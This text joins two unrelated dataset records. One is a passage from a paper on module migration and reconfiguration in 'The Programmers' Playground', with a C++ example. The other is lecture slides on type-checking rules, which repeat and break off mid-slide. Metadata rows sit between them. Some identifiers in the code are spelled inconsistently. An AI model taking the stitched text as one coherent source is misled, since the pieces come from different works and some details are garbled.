order to exchange data with other Playground modules on behalf of the application. Connections
are established by a special Playground application called the connection manager. The connection
manager enforces type compatibility among the data items involved in a connection and also guards
against protection violations by establishing connections only if they satisfy the access privileges
defined for the relevant data items.
The protocol interacts with the connection manager in order to make its module’s presentation
information known to the connection manager and in order to learn about connections affecting
its module. To facilitate communication between the connection manager and the protocol of
each module, the presentation of each playground module includes an externally readable data
structure $P$ that holds a description of the application’s presentation and an externally writable
data structure $L$ that contains link information for that module. Data structures $P$ and $L$ are used
only by the protocol and are hidden from the application.
The connection manager publishes an externally writable set of presentation descriptions $P'$
that is linked to each module’s data structure $P$ with an element-to-aggregate connection. Thus,$P'$ contains a set of presentation descriptions, one for each module in the system. The connection
manager also publishes a set $L'$ of link update records, one link update record each module in
the system. In order for modules, say a front-end to the connection manager, to know about the
connectivity of the system, the connection manager publishes a set $C'$ of connections (not shown
in the figure). For a given module $m$, the element of $C'$ corresponding to $m$ contains the current
connectivity (set of links) for $m$’s published data structures.
For establishing logical connections between the presentations of various modules, the connec-
tion manager publishes a connection request data structure $R$ which may be updated externally
(using an element stream connection) by any module in the system, usually by a graphical front-end
module for the connection manager. For each connection request placed in $R$, the connection man-
ager (through a reaction function) checks for type compatibility, verifies that the connection obeys
the access protections established for the endpoint data structures, and adds the connection to its
published link update record $L'$. This change is reflected in the $L$ data structures of the protocols
corresponding to the endpoints of the connection. In this way, each protocol is aware of each logical
connection in which it is involved. Note that the connection manager is not a communication bot-
thleneck. The connection manager simply sets up the connections that are then handled individually
by the protocols associated with the connected data structures. It is also interesting to note that
the connection management system itself uses the I/O abstraction mechanism to establish links in
the system.
3 Dynamic Reconfiguration Mechanisms
Before proceeding with our discussion of dynamic reconfiguration, we note that the Playground
programming environment, along with the connection manager, satisfies the requirements identified
in Section 1. Requirement (R1), communication among heterogeneous hosts, is provided by the
protocol in the Playground implementation. Requirements (R2) through (R5) are fulfilled by the
fact that the logical configuration is maintained in the connection manager. The protocol and
veneer provide access to messages in transit (R6) and provide a locking mechanism and causal
broadcast algorithm for synchronizing activities (R7). Access to a module's state information (R8)
comes “for free” with the presentation, although each module may keep private data that is not
published in the presentation.
In this section, we present mechanisms for both logical and physical dynamic reconfiguration
in The Programmers’ Playground.
3.1 Logical reconfiguration
The logical configuration in The Programmers’ Playground is maintained by the connection man-
ger, with each protocol being aware of the connections incident to its module and carrying out
the necessary communication under the covers as directed by the veneer. For a module $M$, we say
that the set of modules having logical connections to $M$ are the peers of $M$.
Logical reconfiguration in a running Playground system may involve invoking or terminating
modules, replacing one module by another, and creating and destroying connections. When a module is started, the protocol is automatically launched and links are established with the connection manager (see Section 2.4). When a module terminates, either after completion or due to some failure, the protocol sends out all the pending messages, regarding any updates, to its peers before quitting. The connection manager will then remove the process from all of its connections [5].
We treat replacing a running module by another module as a special case of physical reconfiguration (see Section 3.2), where the module is “moved” to the same machine with replacement of the code.
When a new logical connection is created, the endpoints become aware of it through the connection manager’s presentation. The connection manager enforces type compatibility among the data items involved in a connection and also guards against protection violations by establishing connections only if they satisfy the access privileges defined for the relevant data items. When an existing connection is removed, again the endpoints become aware of it through the connection manager’s presentation. The protocols of these endpoints send out all the pending messages on this connection.
3.2 Physical Reconfiguration
Physical reconfiguration in The Programmers’ Playground involves the reassignment of a module from one processor to another\(^3\). Any mechanism to support this migration must stop the module’s computation on the first processor, move any necessary state from the first processor to the second, and start the computation on the second processor. As defined earlier, the physical reconfiguration algorithm must guarantee that the behavior of each module involved in physical reconfiguration is the same as if the physical reconfiguration did not occur. Thus, every data transmission must occur in the appropriate order, with no such transmissions being lost or duplicated as the result of the migration. Some of the internal computation may be repeated, but the environment should not be able to tell.
Since we wish to avoid expensive state extraction techniques, moving the state information will be accomplished by moving the values in the presentation of the module. However, not all the local
\(^3\)We assume that the assignment of a physical communication path to each logical connection is handled by lower level network protocols, so we do not consider that here.
state information is necessarily exposed in the presentation of a Playground module. In fact, it is desirable to have a relatively narrow interface for interaction with the environment. If the most "important" data is exposed, though, that may be enough to restart the module. Otherwise, the module itself may provide reactive control to package up any remaining state information necessary (the mobile data) in order to move and restart the module. This is described in more detail in the module migration mechanism that we now present.
In the Playground programming environment, all the connections are logical; hence, during physical reconfiguration the connection information needs no changes. However, when a process is moved, messages from its peers somehow have to be received at the new location. When a module is to be moved, the destination module is launched in "waiting" state (see Figure 2a) at the destination machine, and an entry for the new module is created in the connection manager. In this state, only the protocol is active. The user, through the connection manager user interface, can request that the "running" module be taken over by the waiting module (see Figure 2b). The old module continues to execute normally until it receives a HALT command from the connection manager. The connection manager then updates the link information for the peers with the new
address of the module. This update is communicated to its peers using the normal I/O abstraction mechanism. Figure 2c shows peer 1 having acknowledged the connection manager and starting to send messages to the new module, with peer 2 still not having seen the update from the connection manager and still sending its messages to the old module. In both cases, the old module continues to send its messages to the peers. After all the peers acknowledge the connection manager, the connection manager sends a HALT command to the old module. Until this command is received, the old module keeps sending its messages to its peers. The peers send their messages to the new module in the destination machine only (see Figure 2d), where they are received and buffered by the new module, which awaits a hand-off message from the old module. The protocol of the old module, after receiving the HALT command from the connection manager, sends its encoded presentation (along with any other mobile data) to the destination as the hand-off message (see Figure 2e). The old module quits after receiving an acknowledgment of the hand-off message (see Figure 2f). Since each module is connected to the connection manager through the distinguished element connection, the corresponding entry for the old module is now deleted. The new module decodes the mobile data and its presentation according to the hand-off message and starts the program from the beginning. This completes the transfer, and the program runs with the transferred mobile data and presentation. Note that the connection manager participates only in the control part of reconfiguration and does not handle any data traffic.
The hand-off message is the actual transfer of control from the old module to the destination. This transfer must be handled carefully to ensure that the resulting behavior is one that could have occurred if the module was never moved. Consequently, the following steps are taken at the source machine just before sending the hand-off message (figure 2e).
(S1) If a reaction function is running, let it complete.
(S2) Suspend active control, respecting atomic changes to the presentation.
(S3) Run an optional cleanup routine provided by the applications programmer.
(S4) Close all open files\(^4\).
(S5) Encode the presentation and mobile data, and hand-off to the destination machine.
---
\(^4\) A distributed file system is assumed so that both the source and destination processors can access the file system.
At the destination, after receiving the hand-off message the following steps are taken:
(D1) Decode the presentation and mobile data.
(D2) Run an optional restart routine provided by the applications programmer.
(D3) Restart the program with the restored presentation and mobile data.
Playground modules can register a a cleanup routine and a restart routine with the protocol using a call Pmobile(cleanups, restart) to the veneer. The veneer calls the restart function if the program is being restarted as part of reconfiguration. The cleanup routine is registered in the veneer and invoked before relocation begins. Since an ongoing reaction function is allowed to complete before reconfiguration, it is desirable to register short reaction functions. Note that, a module need not take advantage of all the features of the reconfiguration mechanism. For example, it may not have active control or a restart routine.
4 Paradigms for Constructing Relocatable Modules
A module is relocatable if its behavior is unaffected by module migration. Our module migration mechanism described in Section 3.2 provides flexible support for writing relocatable modules. In this section, we identify certain guidelines for writing relocatable modules. A relocatable program under semantic migration must satisfy the following conditions.
(G1) The module must have a static presentation (only the values of the presentation entries, not the entries themselves, can change).
(G2) The module must have no covert communication with other modules.
(G3) Mobile data is declared globally. (This is an artifact of the current implementation but is not inherent to the basic mechanism.)
(G4) A cleanup function must save any internal data that is not declared mobile.
(G5) A restart function must restore any internal data that is not declared mobile.
(G6) When the module is initialized with a presentation and internal state that could have resulted from a behavior $\beta$ of the module, then the module will exhibit some behavior $\beta'$ such that $\beta\beta'$ is a correct behavior.
Note that our reconfiguration mechanism allows internal data to be stored and retrieved in separate cleanup and restart functions so that the programmer need not be concerned with reconfiguration throughout the code. We now present three different paradigms for writing relocatable modules. All three paradigms are supported by our module migration mechanism, yet they are very different in style and support a wide range of applications.
4.1 Reactive Paradigm
The reactive paradigm is useful for programs that are not autonomous in nature, but instead interact by invocation and response, such as a database server with many clients that access the data by remote procedure calls. A migratable server can be implemented in Playground using exclusively reactive control. Certain parts of the presentation can be designated for input and the others for output. The server module is reactively invoked when its input changes, and upon completion of the request, the result is written to an output variable (that might be connected to the module that made the request).
Migration is useful for this kind of application. For example, consider a server, performing computationally intensive math functions, that is started at a general purpose machine. When a specialized machine becomes available, the server can be moved to the specialized one without the knowledge of other modules in the system. As another example, data base query processing front-ends that react to user queries can be moved closer to the data base using the reactive paradigm.
Such modules have a static presentation and use only I/O abstraction for communication, so (G1) and (G2) are satisfied. When these modules save any global data used by the reaction functions in the mobile data (G3, G4, G5), they become relocatable. The behavioral correctness (G6) follows from the fact that each invocation is processed by a reaction function and module migration does not interrupt reaction functions.
4.2 Active restart Paradigm
The active restart paradigm is useful for programs that have long computations that should be continued after migration. To accomplish this, the programmer may provide a restart routine, which could initialize the local data structures from the mobile data.
In detail, a relocatable program is always started with a call to the PInitialize routine,
followed by a call to the PGmobile routine (see Section 3.2). The PGmobile call restores the presentation. When a restart routine is registered with the veneer, PGmobile routine will execute the restart routine. If the programmer knows that the program could be relocated later, he/she can have special Playground data structures in the program and store certain intermediate results along with the function that is executing in these mobile data structures. This way, the relocated program can jump to the corresponding function to avoid repeating earlier computation performed by the source module.
In order to allow the programmer to store the current results, a cleanup function can be provided by the programmer which will be invoked before the presentation is saved. The cleanup code can be used to either create a log, or to save certain important data structures from the heap into the mobile data structures. Programs handling time consuming database queries can store, in these data structures, information about how far they have searched so that it will not be lost when the programs move. The cleanup routine can also be used, as pointed out earlier, to close open streams and files.
4.3 Active Transaction Paradigm
Our migration algorithm is designed to respect atomicity of critical sections. Simulations and iterative calculations require active control. These programs read the presentation, take a step, and then update the presentation. Since request for relocation may arrive in the middle of an update, each update must be atomic. All the variables in the presentation must be updated (or none at all and the current step aborted).
Primitives for atomic access to a set of data structures are already provided in Playground for atomic updates to the presentation. If an atomic operation involving several published data structures are required, the programmer may use the functions begin_atomic_step(obj_list) and end_atomic_step() provided by the veneer for encapsulating a set of changes as an atomic step. At the end of the atomic step, all the objects in obj_list are modified as one atomic change.
The programmer of iterative or simulation applications can use the above primitives for the objects that are to be updated at the end of each step. Since the migration algorithm always waits for the completion of any atomic step in progress before migrating, this ensures that the modules will be restarted only from consistent states.
4.4 Discussion
The three paradigms discussed above are supported by the reconfiguration mechanism discussed in Section 3.2, and mixtures of these paradigms may also be useful. For example, modules written under the reactive paradigm and the active transaction paradigm need not register any restart or cleanup codes with their protocols, but nothing prevents the modules from registering these functions. In the active transaction paradigm, a cleanup and a restart function might be provided to save and restore partial results of a transaction. Similarly a program written in the active restart paradigm can also have reactive control by registering reaction functions with some of its variables.
As pointed out earlier in Section 3.1 we use physical reconfiguration, but with a slight twist, to accomplish module replacement. We treat the replacement of module $A$ by module $B$ as if it were a physical reconfiguration in which module $A$ is “moved” to the same machine, except that the code is replaced. We require that both $A$ and $B$ have the same presentation type.
5 Implementation
As of this writing, we have a Playground implementation that includes a veneer for C++, a protocol that uses TCP socket communication on top of the Solaris (UNIX) operating system, and a connection manager. The veneer contains implementations for all the basic Playground data types, tuples, and aggregates (mappings, arrays, and general purpose aggregates).
A relocatable program adds a line `PGmobile (list)` after creating its presentation. This call creates a tuple called `mobileTuple` with each object in list as its fields. If a cleanup and a restart functions are provided in the list they are registered with the veneer, so that the veneer can call them before migration and just before execution in the migrated state. Users start the module normally or with the migrate-wait option. When the PGmobile function is called it creates a presentation entry MIG with READONLY permission in the normal case or with WRITEONLY permission in the migrate-wait case.
Users specify migration by establishing a connection from the MIG variable in the running program to the MIG variable in the waiting program. The user interface already supports such a request, so we are able to reuse the connection specification for migration. When a migration request comes to the connection manager and the participating modules and peer protocols take
their steps (as described in Section 3.2), the veneer of the running module encodes the `mobileTuple` and sends it to the waiting module where it is decoded. Since `mobileTuple` is a Playground data type, the encoding and decoding of this structure comes for "free." The protocols and the connection manager communicate using the facilities already part of the Playground run-time system, resulting in a significant reuse of existing objects.
6 Conclusion and Future Work
The properties of I/O abstraction, particularly the clear separation of computation from communication and the availability of a module's state information, provide advantages for reconfiguration. In this paper, we presented mechanisms for both logical and physical reconfiguration that take advantages of these properties. Process migration techniques often do not take advantage of the way program modules are written [16] and may spend time capturing unnecessary state information. Low-level state capturing is not always easy and may not work across different architectures or languages. As an alternative, we proposed semantic migration in which the meaning, not the low-level bits, are migrated.
The Programmers' Playground is implemented not as a new programming language but instead as a layer (veneer) between each supported programming language and a protocol. In our current implementation, the veneer is written to support applications written in C++. The protocol is implemented in C++ on top of UNIX and uses TCP sockets for the underlying communication mechanism.
An important benefit of I/O abstraction is the potential for integrating discrete data and continuous data within one uniform configuration mechanism. As a testbed for this aspect of the work, we plan to use the high-speed packet-switched network that is being deployed on the Washington University campus [3]. The network, called Zeus, is based on fast packet switching technology that has been developed over the past several years and is designed to support port interfaces at up to 2.4 Gb/s. The Zeus network will allow us to implement multimedia applications that communicate using real-time digital video and audio, as well as symbolic data. Since the network makes bandwidth guarantees, the module being moved might pre-send extra data to be processed at the peers just before sending the hand-off message to the destination machine. This way the relocation
could be smooth (undetectable) even for multimedia applications.
Our mechanism of reconfiguration does not facilitate open files to be moved when a process is relocated. One might imagine a "stable" attribute associated with certain objects provided in the veneer. Changes to these stable objects would be logged on stable storage that could be copied to the destination with the presentation. This would help in the relocation of database modules.
In this paper, we considered reconfiguration in the context of a static presentation. A program must publish its data structures before beginning execution and cannot add or remove entries from its presentation. A "changing" presentation can be achieved partially by using element-to-aggregate connections. For example, a server can publish one variable that is a set of addresses and any number of clients can talk to the server through an element-to-aggregate connection with this set. However, a fully dynamic presentation may be needed for other purposes, for example protection or temporary communication. The problem of writing relocatable modules with fully dynamic presentations remains to be addressed.
References
APPENDIX
A An Example of a Migratory Program
```
0 // work.cc: Program to do some work 100 times
1 #include "PG.hh" // include the Playground veneer library headers
2 PGreal in, out; // the input and output variables
3 PGInt counter = 0; // local counter to keep track of the 100 count
4
5 // do the work once, and increment counter
6 void do_work (PGreal* object) {
7 // SET out = the result of doing the work on *object
8 counter = counter + 1;
9 }
10
11 // The main line of the program
12 main (int argc, char** argv) {
13 PGINitialize (argc, argv); // initialize the program
14 PGpublish (in, "in", WRITE_WORLD); // let values come in
15 PGpublish (out, "out", READ_WORLD); // send values out
16 PGreact (in, do_work); // call do_work if "in" changes
17 PGmobile (&in, &counter); // only addition to make program relocatable
18 while (counter < 100) {
19 // .. local computation..
20 }
21 PGterminate (); // cleanup
22 }
```
Figure 3: A relocatable program.
The module in Figure 3 does some computation 100 times. The number of times the computation is performed is maintained in the counter variable. A peer module that uses this "work" module will send its value into the in variable and will take its result from the out variable. Figure 4 shows the modules and their current logical configuration. The WORK modules is in running state and the NewWORK module is in migrate-wait state. When a connection is established from the variable MIG in WORK to MIG in NewWORK (by clicking the mouse at the source and dragging it to the destination), physical reconfiguration takes place. Since the counter variable is also requested to be packaged in the PGmobile (&in, &counter) call (line number 17), the migrated module will have its counter updated and the NewWORK will run for only the remaining
amount of computation. Note that although the variable count is not part of the presentation, we specified it as part of the mobile data to be transferred upon relocation.
Figure 4: Interacting modules and their configuration.
|
{"Source-Url": "http://openscholarship.wustl.edu/cgi/viewcontent.cgi?article=1309&context=cse_research", "len_cl100k_base": 9335, "olmocr-version": "0.1.53", "pdf-total-pages": 26, "total-fallback-pages": 0, "total-input-tokens": 30843, "total-output-tokens": 11329, "length": "2e13", "weborganizer": {"__label__adult": 0.00030350685119628906, "__label__art_design": 0.00025272369384765625, "__label__crime_law": 0.00022280216217041016, "__label__education_jobs": 0.0006742477416992188, "__label__entertainment": 6.568431854248047e-05, "__label__fashion_beauty": 0.00012254714965820312, "__label__finance_business": 0.00017976760864257812, "__label__food_dining": 0.0002951622009277344, "__label__games": 0.0004665851593017578, "__label__hardware": 0.001216888427734375, "__label__health": 0.0004372596740722656, "__label__history": 0.00023543834686279297, "__label__home_hobbies": 8.416175842285156e-05, "__label__industrial": 0.000370025634765625, "__label__literature": 0.0002486705780029297, "__label__politics": 0.00018966197967529297, "__label__religion": 0.0004367828369140625, "__label__science_tech": 0.030029296875, "__label__social_life": 7.778406143188477e-05, "__label__software": 0.00675201416015625, "__label__software_dev": 0.95654296875, "__label__sports_fitness": 0.0002396106719970703, "__label__transportation": 0.0005850791931152344, "__label__travel": 0.0001901388168334961}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 51637, 0.03531]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 51637, 0.50111]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 51637, 0.89727]], "google_gemma-3-12b-it_contains_pii": [[0, 1733, false], [1733, 3082, null], [3082, 3331, null], [3331, 3331, null], [3331, 5217, null], [5217, 7962, null], [7962, 10045, null], [10045, 12775, null], [12775, 15299, null], [15299, 17892, null], [17892, 20442, null], [20442, 22178, null], [22178, 24938, null], [24938, 27194, null], [27194, 29664, null], [29664, 31051, null], [31051, 33551, null], [33551, 35630, null], [35630, 37980, null], [37980, 40445, null], [40445, 42881, null], [42881, 45301, null], [45301, 47556, null], [47556, 49460, null], [49460, 51410, null], [51410, 51637, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1733, true], [1733, 3082, null], [3082, 3331, null], [3331, 3331, null], [3331, 5217, null], [5217, 7962, null], [7962, 10045, null], [10045, 12775, null], [12775, 15299, null], [15299, 17892, null], [17892, 20442, null], [20442, 22178, null], [22178, 24938, null], [24938, 27194, null], [27194, 29664, null], [29664, 31051, null], [31051, 33551, null], [33551, 35630, null], [35630, 37980, null], [37980, 40445, null], [40445, 42881, null], [42881, 45301, null], [45301, 47556, null], [47556, 49460, null], [49460, 51410, null], [51410, 51637, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 51637, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 51637, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 51637, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 51637, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 51637, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 51637, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 51637, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 51637, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 51637, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 51637, null]], "pdf_page_numbers": [[0, 1733, 1], [1733, 3082, 2], [3082, 3331, 3], [3331, 3331, 4], [3331, 5217, 5], [5217, 7962, 6], [7962, 10045, 7], [10045, 12775, 8], [12775, 15299, 9], [15299, 17892, 10], [17892, 20442, 11], [20442, 22178, 12], [22178, 24938, 13], [24938, 27194, 14], [27194, 29664, 15], [29664, 31051, 16], [31051, 33551, 17], [33551, 35630, 18], [35630, 37980, 19], [37980, 40445, 20], [40445, 42881, 21], [42881, 45301, 22], [45301, 47556, 23], [47556, 49460, 24], [49460, 51410, 25], [51410, 51637, 26]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 51637, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-09
|
2024-12-09
|
ddd28f2dac0f6feaf52f3981ca9e88ef1da39ba0
|
[REMOVED]
|
{"len_cl100k_base": 13996, "olmocr-version": "0.1.53", "pdf-total-pages": 17, "total-fallback-pages": 0, "total-input-tokens": 81428, "total-output-tokens": 16302, "length": "2e13", "weborganizer": {"__label__adult": 0.0005350112915039062, "__label__art_design": 0.0012073516845703125, "__label__crime_law": 0.0004045963287353515, "__label__education_jobs": 0.00496673583984375, "__label__entertainment": 0.0002124309539794922, "__label__fashion_beauty": 0.0002970695495605469, "__label__finance_business": 0.0010480880737304688, "__label__food_dining": 0.000919342041015625, "__label__games": 0.0015163421630859375, "__label__hardware": 0.0011854171752929688, "__label__health": 0.0012502670288085938, "__label__history": 0.000957012176513672, "__label__home_hobbies": 0.00040078163146972656, "__label__industrial": 0.0014276504516601562, "__label__literature": 0.00270843505859375, "__label__politics": 0.0005803108215332031, "__label__religion": 0.0013704299926757812, "__label__science_tech": 0.3037109375, "__label__social_life": 0.0003616809844970703, "__label__software": 0.00946807861328125, "__label__software_dev": 0.66357421875, "__label__sports_fitness": 0.00036406517028808594, "__label__transportation": 0.0012216567993164062, "__label__travel": 0.000316619873046875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 43772, 0.00843]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 43772, 0.33896]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 43772, 0.71725]], "google_gemma-3-12b-it_contains_pii": [[0, 2262, false], [2262, 6230, null], [6230, 9228, null], [9228, 11693, null], [11693, 14497, null], [14497, 16897, null], [16897, 19433, null], [19433, 21676, null], [21676, 23754, null], [23754, 26012, null], [26012, 28733, null], [28733, 31232, null], [31232, 33827, null], [33827, 36939, null], [36939, 40580, null], [40580, 43220, null], [43220, 43772, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2262, true], [2262, 6230, null], [6230, 9228, null], [9228, 11693, null], [11693, 14497, null], [14497, 16897, null], [16897, 19433, null], [19433, 21676, null], [21676, 23754, null], [23754, 26012, null], [26012, 28733, null], [28733, 31232, null], [31232, 33827, null], [33827, 36939, null], [36939, 40580, null], [40580, 43220, null], [43220, 43772, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 43772, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 43772, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 43772, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 43772, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 43772, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 43772, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 43772, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 43772, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 43772, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 43772, null]], "pdf_page_numbers": [[0, 2262, 1], [2262, 6230, 2], [6230, 9228, 3], [9228, 11693, 4], [11693, 14497, 5], [14497, 16897, 6], [16897, 19433, 7], [19433, 21676, 8], [21676, 23754, 9], [23754, 26012, 10], [26012, 28733, 11], [28733, 31232, 12], [31232, 33827, 13], [33827, 36939, 14], [36939, 40580, 15], [40580, 43220, 16], [43220, 43772, 17]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 43772, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
4547224b27cc8a1f976e948a0fac248380249790
|
Type Checking
COS 326
David Walker
Princeton University
Implementing an Interpreter
```
let x = 3 in
x + x
```
- Parsing
- Let ("x", Num 3, Binop(Plus, Var "x", Var "x"))
- Evaluation
- Num 6
- Pretty Printing
- 6
```
Num 6
```
```
Pretty Printing
```
```
6
```
Implementing an Interpreter
```
let x = 3 in
x + x
```
- **Parsing**
- **Type Checking**
- **Evaluation**
- **Pretty Printing**
```
Let ("x",
Num 3,
Binop(Plus, Var "x", Var "x"))
```
```
Num 6
```
```
Pretty Printing
```
```
6
```
```
Type Checking
```
```
Parsing
```
```
Evaluation
```
```
Num 6
```
```
Pretty Printing
```
```
6
```
type t = IntT | BoolT | ArrT of t * t
type x = string (* variables *)
type c = Int of int | Bool of bool
type o = Plus | Minus | LessThan
type e =
Const of c
| Op of e * o * e
| Var of x
| If of e * e * e
| Fun of x * typ * e
| Call of e * e
| Let of x * e * e
type \( t \) = \text{IntT} \mid \text{BoolT} \mid \text{ArrT of } t \times t \\
type \( x \) = \text{string} (* \text{variables} *) \\
type \( c \) = \text{Int of int} \mid \text{Bool of bool} \\
type \( o \) = \text{Plus} \mid \text{Minus} \mid \text{LessThan} \\
type \( e \) =
\begin{array}{l}
\text{Const of } c \\
\mid \text{Op of } e \times o \times e \\
\mid \text{Var of } x \\
\mid \text{If of } e \times e \times e \\
\mid \text{Fun of } x \times \text{typ} \times e \\
\mid \text{Call of } e \times e \\
\mid \text{Let of } x \times e \times e \\
\end{array}
\text{Notice that we require a type annotation here.}
\text{We'll see why this is required for our type checking algorithm later.}
Language Syntax (BNF Definition)
t ::=
int | bool | t -> t
b -- ranges over booleans
n -- ranges over integers
x -- ranges over variable names
c ::= n | b
o ::= + | - | <
e ::= c | e o e | x | if e then e else e | λx:t.e | e e | let x = e in e
type t = IntT | BoolT | ArrT of t * t
type x = string (* variables *)
type c = Int of int | Bool of bool
type o = Plus | Minus | LessThan
type e =
Const of c
| Op of e * o * e
| Var of x
| If of e * e * e
| Fun of x * typ * e
| Call of e * e
| Let of x * e * e
When defining how evaluation worked, we used this notation:
\[
\begin{align*}
e_1 &\rightarrow^* \lambda x.e \\
e_2 &\rightarrow^* v_2 \\
e[v_2/x] &\rightarrow^* v \\
e_1 e_2 &\rightarrow^* v
\end{align*}
\]
In English:
“if \( e_1 \) evaluates to a function with argument \( x \) and body \( e \) and \( e_2 \) evaluates to a value \( v_2 \) and \( e \) with \( v_2 \) substituted for \( x \) evaluates to \( v \) then \( e_1 \) applied to \( e_2 \) evaluates to \( v \)”
And we were also able to translate each rule into 1 case of a function in OCaml. Together all the rules formed the basis for an interpreter for the language.
This notation:
\[ e \rightarrow^* v \]
was read in English as "e evaluates to v."
It described a relation between two things – an expression e and a value v. (And e was related to v whenever e evaluated to v.)
Note also that we usually thought of e on the left as "given" and the v on the right as computed from e (according to the rules).
The typing judgement
This notation:
\[ G \vdash e : t \]
is read in English as "e has type t in context G." It is going to define how type checking works.
It describes a relation between three things – a type checking context G, an expression e, and a type t.
We are going to think of G and e as given, and we are going to compute t. The typing rules are going to tell us how.
What is the type checking context \( G \)?
Technically, I'm going to treat \( G \) as if it were a (partial) function that maps variable names to types. Notation:
\[
\begin{align*}
G(x) & \quad \text{-- look up x's type in } G \\
G, x : t & \quad \text{-- extend } G \text{ so that } x \text{ maps to } t
\end{align*}
\]
When \( G \) is empty, I'm just going to omit it. So I'll sometimes just write: \( \vdash e : t \)
Here's an example context:
x:int, y:bool, z:int
Think of a context as a series of "assumptions" or "hypotheses"
Read it as the assumption that "x has type int, y has type bool and z has type int"
In the substitution model, if you assumed x has type int, that means that when you run the code, you had better actually wind up substituting an integer for x.
Typing Contexts and Free Variables
One more bit of intuition:
If an expression e contains free variables x, y, and z then we need to supply a context G that contains types for at least x, y and z. If we don't, we won't be able to type check e.
Goal: Give rules that define the relation "G |- e : t".
To do that, we are going to give one rule for every sort of expression.
(We can turn each rule into a case of a recursive function that implements it pretty directly.)
Typing Contexts and Free Variables
Rule for constant booleans:
\[ G \vdash b : \text{bool} \]
English:
“boolean constants \( b \) \textit{always} have type \text{bool}, no matter what the context \( G \) is"
Typing Contexts and Free Variables
```plaintext
t ::= int | bool | t -> t
c ::= n | b
o ::= + | - | <
e ::= c
| e o e
| x
| if e then e else e
| λx:t.e
| e e
| let x = e in e
Rule for constant integers:
\[ G |- n : \text{int} \]
English:
“integer constants n *always* have type int, no matter what the context G is"
Typing Contexts and Free Variables
t ::= int | bool | t -> t
c ::= n | b
o ::= + | - | <
e ::= c
| e o e
| x
| if e then e else e
| \(\lambda\) x : t . e
| e e
| let x = e in e
Rule for operators:
\[
\begin{align*}
G |- e_1 : t_1 & \quad G |- e_2 : t_2 \quad \text{optype}(o) = (t_1, t_2, t_3) \\
\hline
G |- e_1 o e_2 : t_3
\end{align*}
\]
where
\[
\begin{align*}
\text{optype (+)} &= (\text{int}, \text{int}, \text{int}) \\
\text{optype (-)} &= (\text{int}, \text{int}, \text{int}) \\
\text{optype (<)} &= (\text{int}, \text{int}, \text{bool})
\end{align*}
\]
English:
“\(e_1 o e_2\) has type \(t_3\), if \(e_1\) has type \(t_1\), \(e_2\) has type \(t_2\) and \(o\) is an operator that takes arguments of type \(t_1\) and \(t_2\) and returns a value of type \(t_3\)"
Typing Contexts and Free Variables
\[ t ::= \text{int} \mid \text{bool} \mid t \rightarrow t \]
\[ c ::= n \mid b \]
\[ o ::= + \mid - \mid < \]
\[ e ::= c \mid e \circ e \mid x \mid \text{if } e \text{ then } e \text{ else } e \mid \lambda x: t. e \mid e \circ e \mid \text{let } x = e \text{ in } e \]
**Rule for variables:**
\[
G \vdash x : G(x)
\]
**English:**
“variable \( x \) has the type given by the context"
Note: this rule explains (part) of why the context needs to provide types for all of the free variables in an expression.
Typing Contexts and Free Variables
<table>
<thead>
<tr>
<th>t ::= int</th>
<th>bool</th>
<th>t -> t</th>
</tr>
</thead>
<tbody>
<tr>
<td>c ::= n</td>
<td>b</td>
<td></td>
</tr>
<tr>
<td>o ::= +</td>
<td>-</td>
<td><</td>
</tr>
<tr>
<td>e ::= c</td>
<td>e o e</td>
<td>x</td>
</tr>
</tbody>
</table>
**Rule for if:**
\[
\begin{align*}
&G |- e1 : \text{bool} && G |- e2 : t && G |- e3 : t \\
&G |- \text{if e1 then e2 else e3 : t}
\end{align*}
\]
**English:**
“if e1 has type bool and e2 has type t and e3 has (the same) type t then e1 then e2 else e3 has type t"
Typing Contexts and Free Variables
Rule for functions:
$$\frac{G, x:t |- e : t2}{G |- \lambda x:t.e : t \rightarrow t2}$$
English:
"if G extended with x:t proves e has type t2 then \( \lambda x:t.e \) has type t -> t2"
Typing Contexts and Free Variables
